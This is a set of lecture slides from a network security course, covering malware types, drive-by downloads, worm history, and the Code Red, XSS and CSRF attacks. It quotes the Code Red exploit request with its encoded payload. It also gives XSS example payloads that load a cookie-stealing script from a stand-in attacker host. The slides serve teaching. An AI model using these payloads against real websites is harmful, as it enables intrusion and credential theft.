150 likes | 160 Views
Malwares, Worms, and Web Issues. IT443 – Network Security Administration Instructor: Bo Sheng. Malware. Computer systems still have many vulnerabilities When exposed to the Internet leads to exploitation Major issue as computer systems become more ubiquitous
E N D
Malwares, Worms, and Web Issues IT443 – Network Security Administration Instructor: Bo Sheng
Malware • Computer systems still have many vulnerabilities • When exposed to the Internet leads to exploitation • Major issue as computer systems become more ubiquitous • Malware is a generic term that refers to malicious software • Terminology • Virus: computer program designed to spread (require human intervention) • Worm: does not require human intervention • Trojan horse: allows remote access to unauthorized users • Adware: ads when application is running • Spyware: monitors & collets information to be transmitted to a third party without user knowledge/consent
Threats to Networks • Motivation evolved from pursuit of fame to financial and political • Examples • BGP hijacking (e.g., 2008 youtube hijacking) • Viruses, worms and bots are more stealthy today • 2008-2009 conficker infected 2-15 million windows servers • Malware is more prevalent than ever, leading to an underground economy (XSS attacks) • “MPack is sold as commercial software (costing $500 to $1,000 US), and is provided by its developers with technical support and regular updates of the software vulnerabilities it exploits.”
Some Interesting Numbers • From • “The Business of Roguware”, PandaLabs, 2010 • “The Business of Cybercrime”, PandaLabs, 2008 • “Web Based Attacks”, Symantec, 2009 • Adware industry is worth 2 billion dollars per year • Malware industry is worth 105 billion dollars per year • > 80% of the e-mail traffic out there is spam • 50%-80% of computers connected to Internet infected with spyware • Some people make 20 thousand dollars (!) per month using botnets (i.e., compromised computers) • A 26 year-old made 20 million dollars with spam before being caught • 2 billion dollars was lost to phishers four years ago
Online Crime is a Business Now • Klikparty, 2007
Web Attacks - Trends [Symantec White Paper 08- 2/09] • Drive by download from mainstream websites • Dynamic and highly obfuscated malware • Browser plugins • Misleading applications • SQL injection on mainstream websites • Malvertisements: users redirected to malicious websites • Exponential increase in unique and targeted malware samples
Web Attacks – Sequence of Events • Breaking into legitimate websites to post malware • Attacking end user machines • Leveraging end user machines for malicious activities
Attacking Users Machines • Drive by download sequence of events • Compromise legitimate website • User visits, if a multimedia plugin is out of date => can be compromised • Redirect to malicious website which obtains information such as web browser, OS, plugins • Serve malicious multimedia data to compromise machine • Steal personal information • Software vulnerabilities [report indicates 600M browsers insecure] • Web attack toolkits (off the shelf) • Neosploit, Mpack, IcePack, El Fiesta, Adpack • Efficient: profiling the victim, timing (below the radar), geographic variances, old to new exploits, brute force, playing the odds, obfuscation, polymorphic malware/urls • Obfuscation using encryption difficult to detect
History of Worms • Worms self-replicate by exploiting vulnerabilities in remote machines • Apps running on some port • Vulnerabilities are purchased for malicious and legitimate use • Worms carry a payload to take actions • One of the first worms to extensively spread by Robert Morris, 1988 • Uses fingerd and sendmail buffer overflow, rsh, weak passwords • Around 10% Internet hosts infected • Convicted, 3 years of probation, 400 hours of community service work • Many worms since then with a peak during 2000-2004 period • Today worms are more stealthy
Code Red • “How to Own the Internet on your Spare Time”, S. Staniford, V. Paxson, N. Weaver, USENIX Security 2002. • Date July 13th, 2001 / July 19th, 2001 • Exploit • Microsoft IIS webservers using .ida vulnerability [published June 18, 2001] • Payload • Website defacement • DDoS a list of web sites including www.whitehouse.gov • Spreading • 99 threads: each generates random IP address and infects • 100th thread: defaces website
Code Red CRv1 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Cross-site Scripting (XSS) • Vulnerability commonly found in web applications • attackers inject malicious code (e.g. JavaScript programs) into victim’s web browser • steal the victim’s credentials, such as cookies • bypass the access control policies
Cross-site Scripting (XSS) • Bob has a legitimate web site, and Alice is a registered user • Bob’s web site allows queries like http://bobssite.org?q=search_term • The attacker finds the XSS vulnerability http://bobssite.org?q=<script%20type='text/javascript'>alert('xss');</script> • Non-persistent • The attack emails Alice with a link http://bobssite.org?q=puppies<script%20src="http://mallorysevilsite.com/authstealer.js" • Persistent • The attacker posts a comment. I love the puppies in this story! They're so cute!<script src="http://mallorysevilsite.com/authstealer.js">
Cross-Site Request Forgery • The victim user logs into the trusted site using his username and password, and thus creates a new session. • The trusted site stores the session identifier for the session in a cookie in the victim user’s web browser. • The victim user visits a malicious site. • The malicious site’s web page sends a request to the trusted site from the victim user’s browser. • The web browser automatically attaches the session cookie to the malicious request because it is targeted for the trusted site. • The trusted site processes the malicious request forged by the attacker web site.
Legitimate Websites • Shift from pornographic/pirateware websites to legitimate websites • Why? more users, less suspicion • In 2008, symantec observed Web attacks from 808,000 unique domains, many of which are mainstream websites • Complex websites with content from many sources (ads), dynamically generated, running on user machines, requiring plugins • How? • SQL injection (inject malicious html code in backend database and serve it to user). Trojan.Asprox automates the process: 1) search the web for vulnerable websites, 2) inject invisible iframe pointing to malicious pages • Malicious Advertisements: hard to validate given the amount of ads, hard to detect ads appear with low frequency, usually ad is OK but redirects to a malicious website • Search engine redirection, attacks on backend of virtual hosting, vulnerabilities in webserver or forum server, cross-site scripting attacks